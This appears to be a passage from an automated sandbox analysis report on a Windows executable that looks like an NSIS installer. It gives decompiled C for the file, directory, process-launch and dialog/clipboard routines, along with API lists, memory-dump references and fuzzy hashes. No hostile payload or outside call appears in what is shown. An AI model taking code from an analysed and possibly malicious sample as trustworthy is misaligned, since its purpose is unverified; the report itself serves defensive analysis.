				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                                    0x004057d6
                                                                                                                                    0x004057de
                                                                                                                                    0x00000000
                                                                                                                                    0x004057e4
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,0040339C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 004057D6
                                                                                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004057E4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                    • Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                                                                                    • Instruction ID: 7917fbb3929a9c129cc829dd55927f4d0611b804e73fbe07aaab10779adde687
                                                                                                                                    • Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                                                                                    • Instruction Fuzzy Hash: 7DC04C30215A01DADA505F31DF18717BA55BB64741F11443AA146E60E0DA348415E92D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405D77, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405D77(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                    0x00405d7b
                                                                                                                                    0x00405d8b
                                                                                                                                    0x00405d93
                                                                                                                                    0x00000000
                                                                                                                                    0x00405d9a
                                                                                                                                    0x00000000
                                                                                                                                    0x00405d9c

                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D440,00415440,0040335E,0040A130,0040A130,00403262,0041D440,00004000,?,00000000,0040310C), ref: 00405D8B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                                                                                                    • Instruction ID: 851e167300276639316dcfef42321f21f919bee8e2bb8d874df264e532a52d6d
                                                                                                                                    • Opcode Fuzzy Hash: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                                                                                                    • Instruction Fuzzy Hash: 87E08C3221025EABCF119FA08C04EEB3B6CEF00360F008433FD21E7080D630E9209BA8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405DA6, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405DA6(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                                    0x00405daa
                                                                                                                                    0x00405dba
                                                                                                                                    0x00405dc2
                                                                                                                                    0x00000000
                                                                                                                                    0x00405dc9
                                                                                                                                    0x00000000
                                                                                                                                    0x00405dcb

                                                                                                                                    APIs
                                                                                                                                    • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004165B0,00415440,004032E2,00415440,004165B0,0040B880,0041D440,00004000,?,00000000,0040310C), ref: 00405DBA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                    • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                                                                    • Instruction ID: 7b60e7d2bda0d683959e4e11deb6a35caf3210c0b79bbd48d176854978c937ac
                                                                                                                                    • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                                                                    • Instruction Fuzzy Hash: 29E0863221075AABCF115E508C04AEB3B6CEF00350F108433F914E2090D230E8108BA8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403361, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00403361(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                                    0x0040336f
                                                                                                                                    0x00403375

                                                                                                                                    APIs
                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403061,?), ref: 0040336F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FilePointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                    • Opcode ID: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                                                                                                    • Instruction ID: 81fdcbbc46e9ac73494c3809a02cbb86869920566b24394b282a4516d046c7b0
                                                                                                                                    • Opcode Fuzzy Hash: af556f1437a27586b8d302be8c6d190c2fb2fb51029204f11d8d070fc2108142
                                                                                                                                    • Instruction Fuzzy Hash: 32B01231140300BFDA214F00DF09F057B21AB90700F10C034B384780F086711075EB0D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00401F48, Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                    			E00401F48(void* __ecx) {
				void* _t8;
				void* _t12;
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t20;
				void* _t22;

				_t16 = __ecx;
				_t19 = E00402B2C(_t14);
				E0040528D(0xffffffeb, _t6);
				_t8 = E00405805(_t19); // executed
				_t20 = _t8;
				if(_t20 == _t14) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x2c)) != _t14) {
						_t12 = E00406573(_t16, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x30)) < _t14) {
							if(_t12 != _t14) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004060C4(_t17, _t12);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}










                                                                                                                                    0x00401f48
                                                                                                                                    0x00401f4e
                                                                                                                                    0x00401f53
                                                                                                                                    0x00401f59
                                                                                                                                    0x00401f5e
                                                                                                                                    0x00401f62
                                                                                                                                    0x00402783
                                                                                                                                    0x00401f68
                                                                                                                                    0x00401f6b
                                                                                                                                    0x00401f6e
                                                                                                                                    0x00401f76
                                                                                                                                    0x00401f83
                                                                                                                                    0x00401f85
                                                                                                                                    0x00401f85
                                                                                                                                    0x00401f78
                                                                                                                                    0x00401f7a
                                                                                                                                    0x00401f7a
                                                                                                                                    0x00401f76
                                                                                                                                    0x00401f8c
                                                                                                                                    0x00401f8d
                                                                                                                                    0x00401f8d
                                                                                                                                    0x004029bb
                                                                                                                                    0x004029c7

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000,?), ref: 004052C6
                                                                                                                                      • Part of subcall function 0040528D: lstrlenA.KERNEL32(00402DEC,0042A078,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402DEC,00000000), ref: 004052D6
                                                                                                                                      • Part of subcall function 0040528D: lstrcatA.KERNEL32(0042A078,00402DEC,00402DEC,0042A078,00000000,00000000,00000000), ref: 004052E9
                                                                                                                                      • Part of subcall function 0040528D: SetWindowTextA.USER32(0042A078,0042A078), ref: 004052FB
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405321
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040533B
                                                                                                                                      • Part of subcall function 0040528D: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405349
                                                                                                                                      • Part of subcall function 00405805: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0A0,Error launching installer), ref: 0040582E
                                                                                                                                      • Part of subcall function 00405805: CloseHandle.KERNEL32(?), ref: 0040583B
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F8D
                                                                                                                                      • Part of subcall function 00406573: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406584
                                                                                                                                      • Part of subcall function 00406573: GetExitCodeProcess.KERNELBASE ref: 004065A6
                                                                                                                                      • Part of subcall function 004060C4: wsprintfA.USER32 ref: 004060D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2972824698-0
                                                                                                                                    • Opcode ID: df980fb5c03f338f106cd6e0037e4a477a16ca569a7aca04030e70ad4a59cb50
                                                                                                                                    • Instruction ID: 09bfed3a8864f0742b6d01e661b087d633fc871929b21651a2f30fa3afb995fb
                                                                                                                                    • Opcode Fuzzy Hash: df980fb5c03f338f106cd6e0037e4a477a16ca569a7aca04030e70ad4a59cb50
                                                                                                                                    • Instruction Fuzzy Hash: 61F09072A05111ABCB21BFA59A848EF72A8AF41314B11427FE901B32D1C77C49469ABE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 004053CB, Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E004053CB(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec04; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040535F, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00406188(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a898;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t150; // 0x1
						if(__eflags == 0) {
							ShowWindow( *0x42f428, 8);
							__eflags =  *0x42f4cc - _t150;
							if( *0x42f4cc == _t150) {
								E0040528D( *((intOrPtr*)( *0x42a070 + 0x34)), _t150);
							}
							E004041CD(1);
							goto L25;
						}
						 *0x429c68 = 2;
						E004041CD(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E0040425B(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t150);
						ShowWindow(_v8, 8);
						E00404229(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f434;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t128;
				_v8 = _t128;
				E00404229( *0x42ebf0);
				 *0x42ebf4 = E00404B1A(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004041F4(_a4);
				if(( *0x42f43c & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t150);
					if(( *0x42f43c & 0x00000002) != 0) {
						 *0x42ebf0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404229( *0x42ebe8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f43c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                                                                                                    0x004053d1
                                                                                                                                    0x004053d9
                                                                                                                                    0x004053dc
                                                                                                                                    0x004053e4
                                                                                                                                    0x004053e7
                                                                                                                                    0x00405576
                                                                                                                                    0x0040557c
                                                                                                                                    0x004055a0
                                                                                                                                    0x004055a0
                                                                                                                                    0x004055ac
                                                                                                                                    0x004055b2
                                                                                                                                    0x004055d4
                                                                                                                                    0x004055d4
                                                                                                                                    0x004055da
                                                                                                                                    0x0040562f
                                                                                                                                    0x0040562f
                                                                                                                                    0x00405632
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405634
                                                                                                                                    0x00405637
                                                                                                                                    0x0040563a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00405644
                                                                                                                                    0x0040564a
                                                                                                                                    0x0040564c
                                                                                                                                    0x0040564f
                                                                                                                                    0x0040574c
                                                                                                                                    0x00000000
                                                                                                                                    0x0040574c
                                                                                                                                    0x0040565e
                                                                                                                                    0x0040566a
                                                                                                                                    0x00405673
                                                                                                                                    0x0040567a
                                                                                                                                    0x0040567e
                                                                                                                                    0x00405681
                                                                                                                                    0x0040568a
                                                                                                                                    0x00405690
                                                                                                                                    0x00405693
                                                                                                                                    0x00405693
                                                                                                                                    0x004056a3
                                                                                                                                    0x004056a9
                                                                                                                                    0x004056ac
                                                                                                                                    0x004056b7
                                                                                                                                    0x004056b7
                                                                                                                                    0x004056b8
                                                                                                                                    0x004056bb
                                                                                                                                    0x004056c2
                                                                                                                                    0x004056c9
                                                                                                                                    0x004056d1
                                                                                                                                    0x004056d1
                                                                                                                                    0x004056df
                                                                                                                                    0x004056e5
                                                                                                                                    0x004056e8
                                                                                                                                    0x004056e8
                                                                                                                                    0x004056ef
                                                                                                                                    0x004056f5
                                                                                                                                    0x004056fe
                                                                                                                                    0x00405705
                                                                                                                                    0x0040570e
                                                                                                                                    0x00405710
                                                                                                                                    0x00405713
                                                                                                                                    0x00405722
                                                                                                                                    0x00405724
                                                                                                                                    0x00405727
                                                                                                                                    0x00405728
                                                                                                                                    0x0040572b
                                                                                                                                    0x0040572c
                                                                                                                                    0x0040572d
                                                                                                                                    0x0040572d
                                                                                                                                    0x00405735
                                                                                                                                    0x00405740
                                                                                                                                    0x00405746
                                                                                                                                    0x00405746
                                                                                                                                    0x00000000
                                                                                                                                    0x004056ac
                                                                                                                                    0x004055dc
                                                                                                                                    0x004055e2
                                                                                                                                    0x00405610
                                                                                                                                    0x00405612
                                                                                                                                    0x00405618
                                                                                                                                    0x00405623
                                                                                                                                    0x00405623
                                                                                                                                    0x0040562a
                                                                                                                                    0x00000000
                                                                                                                                    0x0040562a
                                                                                                                                    0x004055e6
                                                                                                                                    0x004055f0
                                                                                                                                    0x00000000
                                                                                                                                    0x004055b4
                                                                                                                                    0x004055b4
                                                                                                                                    0x004055ba
                                                                                                                                    0x004055f5
                                                                                                                                    0x00000000
                                                                                                                                    0x004055fc
                                                                                                                                    0x004055c3
                                                                                                                                    0x004055ca
                                                                                                                                    0x004055cf
                                                                                                                                    0x00000000
                                                                                                                                    0x004055cf
                                                                                                                                    0x004055b2
                                                                                                                                    0x004053ed
                                                                                                                                    0x004053f1
                                                                                                                                    0x004053f9
                                                                                                                                    0x004053fd
                                                                                                                                    0x00405400
                                                                                                                                    0x00405403
                                                                                                                                    0x00405406
                                                                                                                                    0x00405409
                                                                                                                                    0x0040540a
                                                                                                                                    0x0040540b
                                                                                                                                    0x00405424
                                                                                                                                    0x00405427
                                                                                                                                    0x00405431
                                                                                                                                    0x00405440
                                                                                                                                    0x00405448
                                                                                                                                    0x00405450
                                                                                                                                    0x00405455
                                                                                                                                    0x00405458
                                                                                                                                    0x00405464
                                                                                                                                    0x0040546d
                                                                                                                                    0x00405476
                                                                                                                                    0x00405498
                                                                                                                                    0x0040549e
                                                                                                                                    0x004054af
                                                                                                                                    0x004054b4
                                                                                                                                    0x004054c2
                                                                                                                                    0x004054d0
                                                                                                                                    0x004054d0
                                                                                                                                    0x004054d5
                                                                                                                                    0x004054e3
                                                                                                                                    0x004054e3
                                                                                                                                    0x004054e8
                                                                                                                                    0x004054eb
                                                                                                                                    0x004054f0
                                                                                                                                    0x004054fc
                                                                                                                                    0x00405505
                                                                                                                                    0x00405512
                                                                                                                                    0x00405521
                                                                                                                                    0x00405514
                                                                                                                                    0x00405519
                                                                                                                                    0x00405519
                                                                                                                                    0x0040552d
                                                                                                                                    0x0040552d
                                                                                                                                    0x00405541
                                                                                                                                    0x0040554a
                                                                                                                                    0x00405553
                                                                                                                                    0x00405563
                                                                                                                                    0x0040556f
                                                                                                                                    0x0040556f
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32 ref: 0040542A
                                                                                                                                    • GetDlgItem.USER32 ref: 00405439
                                                                                                                                    • GetClientRect.USER32 ref: 00405476
                                                                                                                                    • GetSystemMetrics.USER32 ref: 0040547D
                                                                                                                                    • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040549E
                                                                                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004054AF
                                                                                                                                    • SendMessageA.USER32(?,00001001,00000000,?), ref: 004054C2
                                                                                                                                    • SendMessageA.USER32(?,00001026,00000000,?), ref: 004054D0
                                                                                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 004054E3
                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405505
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405519
                                                                                                                                    • GetDlgItem.USER32 ref: 0040553A
                                                                                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040554A
                                                                                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405563
                                                                                                                                    • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040556F
                                                                                                                                    • GetDlgItem.USER32 ref: 00405448
                                                                                                                                      • Part of subcall function 00404229: SendMessageA.USER32(00000028,?,00000001,00404059), ref: 00404237
                                                                                                                                    • GetDlgItem.USER32 ref: 0040558B
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000535F,00000000), ref: 00405599
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004055A0
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004055C3
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004055CA
                                                                                                                                    • ShowWindow.USER32(00000008), ref: 00405610
                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405644
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405655
                                                                                                                                    • AppendMenuA.USER32 ref: 0040566A
                                                                                                                                    • GetWindowRect.USER32 ref: 0040568A
                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056A3
                                                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056DF
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 004056EF
                                                                                                                                    • EmptyClipboard.USER32 ref: 004056F5
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,?), ref: 004056FE
                                                                                                                                    • GlobalLock.KERNEL32 ref: 00405708
                                                                                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040571C
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405735
                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00405740
                                                                                                                                    • CloseClipboard.USER32 ref: 00405746
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 590372296-0
                                                                                                                                    • Opcode ID: 63d4257cbd14a3ce0721bb6531c25f238ba2db9f0d997906a777c147de34918f
                                                                                                                                    • Instruction ID: 3d72dfa356574d8e75ed6f12635f4fd1798d9b1858731c32f80cd1131c1c2787
                                                                                                                                    • Opcode Fuzzy Hash: 63d4257cbd14a3ce0721bb6531c25f238ba2db9f0d997906a777c147de34918f
